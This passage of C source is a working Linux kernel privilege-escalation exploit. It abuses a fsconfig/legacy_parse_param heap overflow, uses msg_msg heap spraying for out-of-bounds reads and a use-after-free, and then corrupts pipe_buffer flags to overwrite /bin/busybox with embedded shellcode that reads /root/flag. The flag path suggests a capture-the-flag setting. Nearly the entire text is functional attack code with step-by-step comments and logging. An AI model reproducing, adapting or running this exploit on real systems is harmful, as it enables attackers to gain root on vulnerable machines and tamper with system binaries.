0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x68, 0x60, 0x66, 0x01, 0x01, 0x81, 0x34, 0x24, 0x01, 0x01, 0x01, 0x01,
0x48, 0xb8, /* /root */ 0x2f, 0x72, 0x6f, 0x6f, 0x74, /* /flag */ 0x2f, 0x66, 0x6c, 0x50, 0x6a,
0x02, 0x58, 0x48, 0x89, 0xe7, 0x31, 0xf6, 0x0f, 0x05, 0x41, 0xba, 0xff,
0xff, 0xff, 0x7f, 0x48, 0x89, 0xc6, 0x6a, 0x28, 0x58, 0x6a, 0x01, 0x5f,
0x99, 0x0f, 0x05, 0xEB
};

int sockfd;
int sock_pairs[NUM_SOCKETS][2];
int msqid_1[NUM_MSQIDS_1];
int msqid_2[NUM_MSQIDS_2];
struct typ_msg_a msg_a = {0};
struct typ_msg_a_oob msg_a_oob = {0};
struct typ_msg_b msg_b = {0};
int list1_corrupted_msqid = -1;
int list2_leak_msqid = -1;
int list2_leak_mtype = 0;
uint64_t list2_uaf_msg_addr = 0;
int list2_uaf_mtype = 0;
uint64_t heap_buffer_addr = 0;
int dummy_pipe[NUM_PIPES][2];

void z() {
logd("waiting...\n");
getchar();
}

/* Terminates the process with exit status 1. */
void die() {
exit(1);
}

/*
 * Write a hex + ASCII dump of `size` bytes starting at `data` through logd().
 *
 * Each row shows up to 16 bytes as two-digit upper-case hex values, split
 * into two groups of eight, followed by '|' and the printable rendering of
 * the same bytes ('.' replaces anything outside ' '..'~'). Nothing is
 * printed when size is 0.
 *
 * A short final row is padded with three spaces per missing byte, the same
 * width "%02X " occupies, so its ASCII column lines up with the full rows.
 */
void hexdump(const void *data, size_t size) {
    const unsigned char *bytes = data;
    char ascii[17];
    size_t i, j;

    ascii[16] = '\0';
    for (i = 0; i < size; ++i) {
        const unsigned char c = bytes[i];

        logd("%02X ", c);
        ascii[i % 16] = (c >= ' ' && c <= '~') ? (char)c : '.';

        if ((i + 1) % 8 == 0 || i + 1 == size) {
            /* group separator after 8 bytes, or end of data */
            logd(" ");
            if ((i + 1) % 16 == 0) {
                logd("| %s \n", ascii);
            } else if (i + 1 == size) {
                ascii[(i + 1) % 16] = '\0';
                if ((i + 1) % 16 <= 8) {
                    /* stands in for the separator between the two groups */
                    logd(" ");
                }
                for (j = (i + 1) % 16; j < 16; ++j) {
                    logd("   ");
                }
                logd("| %s \n", ascii);
            }
        }
    }
}

/* Write `text` to the file at `path`. Failures are reported with perror()
 * and otherwise ignored, so the caller stays best-effort. */
static void init_unshare_write_file(const char *path, const char *text) {
    int fd = open(path, O_WRONLY);

    if (fd < 0) {
        perror(path);
        return;
    }
    if (write(fd, text, strlen(text)) < 0) {
        perror(path);
    }
    close(fd);
}

/*
 * Enter new mount and user namespaces and map the caller's uid/gid to 0
 * inside them (the sequence `unshare -Ur` performs).
 *
 * The ids are sampled BEFORE unshare(): once inside the new user namespace,
 * and until a mapping exists, getuid()/getgid() report the overflow id rather
 * than the real one, and a map line naming that id is rejected.
 *
 * Every step is best-effort: errors are printed but do not stop the program.
 */
void init_unshare() {
    char buff[0x100];
    const uid_t outer_uid = getuid();
    const gid_t outer_gid = getgid();

    // strace from `unshare -Ur xxx`
    if (unshare(CLONE_NEWNS | CLONE_NEWUSER) < 0) {
        perror("unshare");
    }

    /* setgroups must be denied before gid_map may be written. */
    init_unshare_write_file("/proc/self/setgroups", "deny");

    snprintf(buff, sizeof(buff), "0 %d 1", (int)outer_uid);
    init_unshare_write_file("/proc/self/uid_map", buff);

    snprintf(buff, sizeof(buff), "0 %d 1", (int)outer_gid);
    init_unshare_write_file("/proc/self/gid_map", buff);
}

/* Creates one private message queue per slot of msqid_1 and then of msqid_2.
 * Logs and calls die() on the first msgget() failure. */
void init_msq() {
    int *const tables[] = { msqid_1, msqid_2 };
    const int counts[] = { NUM_MSQIDS_1, NUM_MSQIDS_2 };

    for (int t = 0; t < 2; t++) {
        for (int slot = 0; slot < counts[t]; slot++) {
            const int id = msgget(IPC_PRIVATE, IPC_CREAT | 0666);

            tables[t][slot] = id;
            if (id < 0) {
                logd("[-] msgget() fail\n");
                die();
            }
        }
    }
}

/* Opens the global TCP socket `sockfd` and NUM_SOCKETS AF_UNIX stream socket
 * pairs in `sock_pairs`. Logs and calls die() on the first failure. */
void init_sock() {
    int idx = 0;

    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) {
        logd("[-] socket() fail\n");
        die();
    }

    while (idx < NUM_SOCKETS) {
        const int rc = socketpair(AF_UNIX, SOCK_STREAM, 0, sock_pairs[idx]);

        if (rc < 0) {
            logd("[-] socketpair() fail\n");
            die();
        }
        idx++;
    }
}

/* Receives (without blocking) one MTYPE_A message from every queue in
 * msqid_1; the received text lands in the global msg_a and results are ignored. */
void clean_msq_1() {
    const int *cur = msqid_1;
    const int *const end = msqid_1 + NUM_MSQIDS_1;

    while (cur != end) {
        msgrcv(*cur, &msg_a, sizeof(msg_a.mtext), MTYPE_A, IPC_NOWAIT);
        cur++;
    }
}

/* For every queue in msqid_2, receives (without blocking) the messages of
 * the sixteen types MTYPE_B | (j << 8), j = 0..15, in ascending j order.
 * The received text lands in the global msg_b and results are ignored. */
void clean_msq_2() {
    const int total = NUM_MSQIDS_2 * 0x10;

    for (int k = 0; k < total; k++) {
        const int queue = msqid_2[k / 0x10];
        const long type = MTYPE_B | ((k % 0x10) << 8);

        msgrcv(queue, &msg_b, sizeof(msg_b.mtext), type, IPC_NOWAIT);
    }
}

/* For each pipe in dummy_pipe: reads up to 0x100 bytes from the read end,
 * then closes both ends. Return values are ignored. */
void clean_pipe() {
    char scratch[0x100];

    for (int k = 0; k < NUM_PIPES; k++) {
        int *const ends = dummy_pipe[k];

        read(ends[0], scratch, sizeof(scratch));
        close(ends[0]);
        close(ends[1]);
    }
}

/* Restricts the calling thread to CPU 0; on failure prints the error and
 * calls die(). */
void bind_cpu() {
    cpu_set_t mask;

    CPU_ZERO(&mask);
    CPU_SET(0, &mask);
    if (sched_setaffinity(0, sizeof(mask), &mask) == 0) {
        return;
    }
    perror("sched_setaffinity");
    die();
}

/* Opens an "ext4" filesystem context and returns its descriptor; on failure
 * prints the error and calls die(). */
int call_fsopen() {
    const int ctx_fd = fsopen("ext4", 0);

    if (ctx_fd >= 0) {
        return ctx_fd;
    }
    perror("fsopen");
    die();
    return ctx_fd;
}

/* Writes the `size` bytes at `ptr` NUM_SKBUFFS times into the first end of
 * each of the NUM_SOCKETS socket pairs, pair by pair. Logs and calls die()
 * on the first failed write. */
void spray_skbuff_data(void *ptr, size_t size) {
    const int total = NUM_SOCKETS * NUM_SKBUFFS;

    for (int n = 0; n < total; n++) {
        const int tx = sock_pairs[n / NUM_SKBUFFS][0];

        if (write(tx, ptr, size) >= 0) {
            continue;
        }
        logd("[-] write to sock pairs failed\n");
        die();
    }
}

/* Reads up to `size` bytes into `ptr` NUM_SKBUFFS times from the second end
 * of each of the NUM_SOCKETS socket pairs, pair by pair. Logs and calls
 * die() on the first failed read. */
void free_skbuff_data(void *ptr, size_t size) {
    const int total = NUM_SOCKETS * NUM_SKBUFFS;

    for (int n = 0; n < total; n++) {
        const int rx = sock_pairs[n / NUM_SKBUFFS][1];

        if (read(rx, ptr, size) >= 0) {
            continue;
        }
        logd("[-] read from sock pairs failed\n");
        die();
    }
}

/*
 * First stage: information gathering.
 *
 * Fills the global bookkeeping variables list1_corrupted_msqid,
 * list2_leak_msqid, list2_leak_mtype, list2_uaf_msg_addr, list2_uaf_mtype
 * and heap_buffer_addr.
 *
 * fd is a filesystem-context descriptor as returned by call_fsopen().
 * Returns 0 on success and 1 when the attempt should be repeated with a
 * fresh descriptor; unrecoverable errors end the process through die().
 */
uint64_t exploit_step1(int fd) {
char buff[0x1000];
/* Bring the option buffer to 4095 bytes: 255 * 16 + 15. */
logd("[*] prepare fsconfig heap overflow\n");
for (int i = 0; i < 0xff; i++) {
fsconfig(fd, FSCONFIG_SET_STRING, "aaaaaaa", "bbbbbbb", 0);
}
fsconfig(fd, FSCONFIG_SET_STRING, "cccccccc", "ddddd", 0);

// alloc msg_msg with 0x1000(-0x30) body and 0x400(-0x08) msg_msgseg
logd("[*] sparying msg_msg ...\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
memset(&msg_a, 0, sizeof(msg_a));
msg_a.mtype = MTYPE_A;
memset(msg_a.mtext, 'Q', sizeof(msg_a.mtext));
/* Tag each message with a signature and its queue index. */
((int *)&msg_a.mtext)[0] = MSG_SIG;
((int *)&msg_a.mtext)[1] = i;
if (msgsnd(msqid_1[i], &msg_a, sizeof(msg_a.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}

// trigger oob write to overwrite msg_msg.m_ts (hopes)
logd("[*] trigger oob write in `legacy_parse_param` to corrupt msg_msg.m_ts\n");
memset(buff, 0, sizeof(buff));
strcat(buff, "0000000"); // m_list.next
strcat(buff, "11111111"); // m_list.prev
strcat(buff, "22222222"); // m_type
uint64_t target_size = sizeof(msg_a_oob.mtext);
/* Only the two low bytes of the new size are appended. */
memcpy(buff + strlen(buff), &target_size, 2);

fsconfig(fd, FSCONFIG_SET_STRING, "\x00", buff, 0);

// recv from buffer to see if leak success
logd("[*] search corrupted msg_msg ...\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
ssize_t copy_size = msgrcv(msqid_1[i], &msg_a_oob, sizeof(msg_a_oob.mtext), 0, MSG_COPY | IPC_NOWAIT);

if (copy_size < 0) {
continue;
}
/* A full-size copy means this queue holds the message whose size grew. */
if (copy_size == sizeof(msg_a_oob.mtext)) {
logd("[+] corrupted msg_msg found, id: %d\n", msqid_1[i]);
list1_corrupted_msqid = msqid_1[i];
/* Replace the table slot with a fresh queue; the old id is kept in list1_corrupted_msqid. */
msqid_1[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
uint64_t *oob_data = (uint64_t *)(msg_a_oob.mtext + sizeof(msg_a.mtext));
size_t oob_size = sizeof(msg_a_oob.mtext) - sizeof(msg_a.mtext);
if (memcmp(&oob_data[1], "QQQQQQQQ", 8)) { // 'QQQQQQQQ'
logd("[!] but the next object is not allocated by msg_msgseg\n");
}
break;
}
}
if (list1_corrupted_msqid < 0) {
logd("[!] can't found corrupted msg_msg, and kernel may crash :(\n");
clean_msq_1();
return 1;
}

// clean uncorrupted msg_msg
logd("[*] clean unused msg_msg ...\n");
clean_msq_1();

// realloc 0x400 slab with msg_msg
logd("[*] alloc `struct msg_msg` to re-acquire the 0x400 slab freed by msg_msgseg ...\n");
for (int i = 0; i < NUM_MSQIDS_2; i++) {
memset(&msg_b, 0, sizeof(msg_b));
memset(msg_b.mtext, 'W', sizeof(msg_b.mtext));
((int *)&msg_b.mtext)[0] = MSG_SIG;
((int *)&msg_b.mtext)[1] = i;
/* Sixteen messages per queue, distinguished by bits 8..11 of the type. */
for (int j = 0; j < 0x10; j++) {
msg_b.mtype = MTYPE_B | (j << 8);
if (msgsnd(msqid_2[i], &msg_b, sizeof(msg_b.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}
}

// hope leak happen
{
ssize_t copy_size = msgrcv(list1_corrupted_msqid, &msg_a_oob, sizeof(msg_a_oob.mtext), 0, MSG_COPY | IPC_NOWAIT);
if ((copy_size < 0) || (copy_size != sizeof(msg_a_oob.mtext))) {
logd("[-] recv from corrupted msg_msg failed\n");
die();
}
/* The bytes past the regular text length are interpreted as a message header. */
uint64_t *oob_data = (uint64_t *)(msg_a_oob.mtext + sizeof(msg_a.mtext));
size_t oob_size = sizeof(msg_a_oob.mtext) - sizeof(msg_a.mtext);
struct msg_msg *p = (struct msg_msg *)oob_data;
if (((int *)&p->mtext)[0] != MSG_SIG) {
logd("[-] bad luck, we don't catch 0x400 msg_msg\n");
clean_msq_2();
return 1;
}
logd("[*] it works :)\n");

/* Record which queue/type was read and the address and type of its predecessor. */
list2_leak_msqid = msqid_2[((int *)&p->mtext)[1]];
list2_leak_mtype = p->m_type;
list2_uaf_msg_addr = p->m_list.prev;
list2_uaf_mtype = p->m_type - 0x0100;
msqid_2[((int *)&p->mtext)[1]] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
hexdump(msg_a_oob.mtext + sizeof(msg_a.mtext), 0x40);
logd("[+] leak list2_leak_msqid: %d\n", list2_leak_msqid);
logd("[+] leak list2_leak_mtype: 0x%x\n", list2_leak_mtype);
logd("[+] leak list2_uaf_msg_addr: 0x%lx\n", list2_uaf_msg_addr);
logd("[+] leak list2_uaf_mtype: 0x%x\n", list2_uaf_mtype);
}

logd("[*] alloc msg_msg as heap buffer with known address\n");
{
/* Receive every message queued after the leaked one. */
for (int j = ((list2_leak_mtype + 0x100) >> 8); j < 0x10; j++) {
msgrcv(list2_leak_msqid, &msg_b, sizeof(msg_b.mtext), MTYPE_B | (j << 8), IPC_NOWAIT);
}
memset(buff, 0, sizeof(buff));
struct msg_msg *p = (struct msg_msg *)buff;
p->m_list.next = list2_uaf_msg_addr;
p->m_list.prev = 0xdeadbeefdeadbeef;
p->m_type = MTYPE_A;

memset(&msg_b, 0, sizeof(msg_b));
memcpy(msg_b.mtext, buff, sizeof(msg_b.mtext));
msg_b.mtype = MTYPE_B;
if (msgsnd(list2_leak_msqid, &msg_b, sizeof(msg_b.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}

logd("[*] fetch heap_buffer address by oob read again\n");
{
ssize_t copy_size = msgrcv(list1_corrupted_msqid, &msg_a_oob, sizeof(msg_a_oob.mtext), 0, MSG_COPY | IPC_NOWAIT);
if ((copy_size < 0) || (copy_size != sizeof(msg_a_oob.mtext))) {
logd("[-] Recv from corrupted msg_msg failed\n");
die();
}
uint64_t *oob_data = (uint64_t *)(msg_a_oob.mtext + sizeof(msg_a.mtext));
size_t oob_size = sizeof(msg_a_oob.mtext) - sizeof(msg_a.mtext);
struct msg_msg *p = (struct msg_msg *)oob_data;
if (((int *)&p->mtext)[0] != MSG_SIG) {
logd("[-] I don't think this can happen\n");
die();
}
/* Address of the text area of the message just sent (header skipped). */
heap_buffer_addr = p->m_list.next + sizeof(struct msg_msg);
logd("[+] heap_buffer_addr: 0x%lx\n", heap_buffer_addr);
/* The address is later passed as a C string, so it must not contain a zero byte. */
if (strlen((char *)&heap_buffer_addr) < 8) {
logd("[-] pointer can't contain 0x00 bytes\n");
die();
}
}

// clean uncorrupted msg_msg
logd("[*] clean unused msg_msg ...\n");
clean_msq_2();

return 0;
}

/*
 * Second stage: uses the values recorded by exploit_step1() (heap_buffer_addr,
 * list2_leak_msqid, list2_uaf_mtype) and ends by writing elfcode through one
 * of the pipes in dummy_pipe.
 *
 * fd is a fresh filesystem-context descriptor from call_fsopen().
 * Always returns 0 when it returns; every failure path calls die().
 */
int exploit_step2(int fd) {
char buff[0x1000];

logd("[*] prepare fsconfig heap overflow\n");
for (int i = 0; i < 0xff; i++) {
fsconfig(fd, FSCONFIG_SET_STRING, "aaaaaaa", "bbbbbbb", 0);
}
fsconfig(fd, FSCONFIG_SET_STRING, "cccccccc", "ddddd", 0);

// alloc msg_msg with 0x1000(-0x30) body and 0x400(-0x08) msg_msgseg
logd("[*] sparying msg_msg ...\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
memset(&msg_a, 0, sizeof(msg_a));
msg_a.mtype = MTYPE_A;
memset(msg_a.mtext, 'Q', sizeof(msg_a.mtext));
((int *)&msg_a.mtext)[0] = MSG_SIG;
((int *)&msg_a.mtext)[1] = i;
if (msgsnd(msqid_1[i], &msg_a, sizeof(msg_a.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}

// trigger oob write to overwrite msg_msg.next (hopes)
logd("[*] trigger oob write in `legacy_parse_param` to corrupt msg_msg.next\n");
memset(buff, 0, sizeof(buff));
struct msg_msg *p = (struct msg_msg *)buff;
p->m_list.next = heap_buffer_addr;
p->m_list.prev = 0xdeadbeefdeadbeef;
p->m_type = MTYPE_A; // with '=' appended
/* Here the crafted header is passed as the key and the value is empty. */
fsconfig(fd, FSCONFIG_SET_STRING, buff, "\x00", 0);

// free uaf msg_msg
logd("[*] free uaf msg_msg from correct msqid\n");
if (msgrcv(list2_leak_msqid, &msg_b, sizeof(msg_b.mtext), list2_uaf_mtype, 0) < 0) {
logd("[-] msgrcv() fail\n");
die();
}

// spray skbuff_data to re-acquire uaf msg_msg and fake the header
logd("[*] spray skbuff_data to re-acquire the 0x400 slab freed by msg_msg\n");
{
memset(buff, 0, sizeof(buff));
struct msg_msg *p = (struct msg_msg *)buff;
p->m_list.next = heap_buffer_addr + 0x80;
p->m_list.prev = heap_buffer_addr + 0x80;
p->m_ts = 0x100;
p->m_type = MTYPE_FAKE;
p->next = 0;
p->security = 0;
spray_skbuff_data(buff, 0x400 - 0x140);
}

// free uaf msg_msg
logd("[*] free skbuff_data using fake msqid\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
if (msgrcv(msqid_1[i], &msg_b, sizeof(msg_b.mtext), MTYPE_FAKE, IPC_NOWAIT) > 0) {
logd("[*] freed using msqid %d\n", i);
break;
}
}

// filled with pipe_buffer
logd("[*] spray pipe_buffer to re-acquire the 0x400 slab freed by skbuff_data\n");
int busybox = open("/bin/busybox", O_RDONLY);
if (busybox < 0) {
perror("open busybox");
die();
}
for (int i = 0; i < NUM_PIPES; i++) {
if (pipe(dummy_pipe[i])) {
logd("[-] Alloc pipe failed\n");
die();
}

const unsigned pipe_size = fcntl(dummy_pipe[i][1], F_GETPIPE_SZ);
static char tmp_buff[4096];

/* fill the pipe completely; each pipe_buffer will now have
the PIPE_BUF_FLAG_CAN_MERGE flag */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(tmp_buff) ? sizeof(tmp_buff) : r;
write(dummy_pipe[i][1], tmp_buff, n);
r -= n;
}

/* drain the pipe, freeing all pipe_buffer instances (but
leaving the flags initialized) */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(tmp_buff) ? sizeof(tmp_buff) : r;
read(dummy_pipe[i][0], tmp_buff, n);
r -= n;
}

/* The write length 0x100 + i identifies pipe i when the buffer is read back below. */
write(dummy_pipe[i][1], buff, 0x100 + i);

loff_t offset = 1;
ssize_t nbytes = splice(busybox, &offset, dummy_pipe[i][1], NULL, 1, 0);
if (nbytes < 0) {
perror("splice failed");
die();
}
}

logd("[*] free skbuff_data to make pipe_buffer become UAF\n");
int uaf_pipe_idx = 0;
char pipe_buffer_backup[0x280];
int PIPE_BUF_FLAG_CAN_MERGE = 0x10;
{
void *ptr = buff;
uint64_t size = 0x400 - 0x140;
for (int i = 0; i < NUM_SOCKETS; i++) {
for (int j = 0; j < NUM_SKBUFFS; j++) {
if (read(sock_pairs[i][1], ptr, size) < 0) {
logd("[-] read from sock pairs failed\n");
die();
}
/* A fourth 32-bit word in [0x100, 0x100 + NUM_PIPES) is taken as the marker length written above. */
uint32_t test_size = ((uint32_t *)ptr)[3];
if ((test_size >= 0x100) && (test_size < 0x100 + NUM_PIPES)) {
uaf_pipe_idx = test_size - 0x100;
logd("[*] uaf_pipe_idx: %d\n", uaf_pipe_idx);
memcpy(pipe_buffer_backup, ptr, 0x280);
}
}
}
}

logd("[*] edit pipe_buffer->flags\n");
{
memset(buff, 0, sizeof(buff));
memcpy(buff, pipe_buffer_backup, 0x280);
((uint64_t *)buff)[6] = 0; // offset | len
((uint64_t *)buff)[8] = PIPE_BUF_FLAG_CAN_MERGE; // flag
spray_skbuff_data(buff, 0x400 - 0x140);
}

logd("[*] try to overwrite /bin/busybox\n");
{
ssize_t nbytes = write(dummy_pipe[uaf_pipe_idx][1], elfcode, sizeof(elfcode));
if (nbytes < 0) {
perror("write failed");
die();
}
if ((size_t)nbytes < 2) {
fprintf(stderr, "short write\n");
die();
}
}

logd("[+] exploit success\n");
return 0;
}

/*
 * Entry point. Forks a worker that performs the initialisation and both
 * steps, then signals completion by writing one byte to a pipe; the parent
 * waits for that byte.
 *
 * Returns 0 once the worker has signalled completion, and 1 if the pipe or
 * the fork cannot be created or the worker exits without signalling.
 *
 * The parent closes its copy of the pipe's write end before reading.
 * Without that, the read could never see end-of-file and the parent would
 * block forever whenever the worker terminated early through die().
 */
int main(void) {
    int sync_pipe[2];

    if (pipe(sync_pipe) < 0) {
        perror("pipe");
        return 1;
    }

    pid_t pid = fork();
    if (pid < 0) {
        perror("fork");
        return 1;
    }

    if (pid == 0) {
        int fd;

        close(sync_pipe[0]);

        logd("[+] perform initialization\n");
        init_unshare();
        bind_cpu();
        init_msq();
        init_sock();

        fd = call_fsopen();
        logd("[+] perform exploit step1\n");
        while (exploit_step1(fd)) {
            logd("[!] retry step1 ...\n");

            close(fd);
            fd = call_fsopen();
        }

        /* NOTE(review): the step-1 descriptor is left open here, exactly as
         * in the original code - confirm this is intentional. */
        fd = call_fsopen();
        logd("[+] perform exploit step2\n");
        while (exploit_step2(fd)) {
            logd("[!] retry step2 ...\n");

            close(fd);
            fd = call_fsopen();
        }

        write(sync_pipe[1], "A", 1);
        /* The worker never exits on its own after signalling. */
        while (1) {
            sleep(10);
        }
    }

    /* Parent: drop the write end so that a dead worker shows up as EOF. */
    close(sync_pipe[1]);

    char sync;
    if (read(sync_pipe[0], &sync, 1) != 1) {
        logd("[-] worker exited before signalling completion\n");
        return 1;
    }

    return 0;
}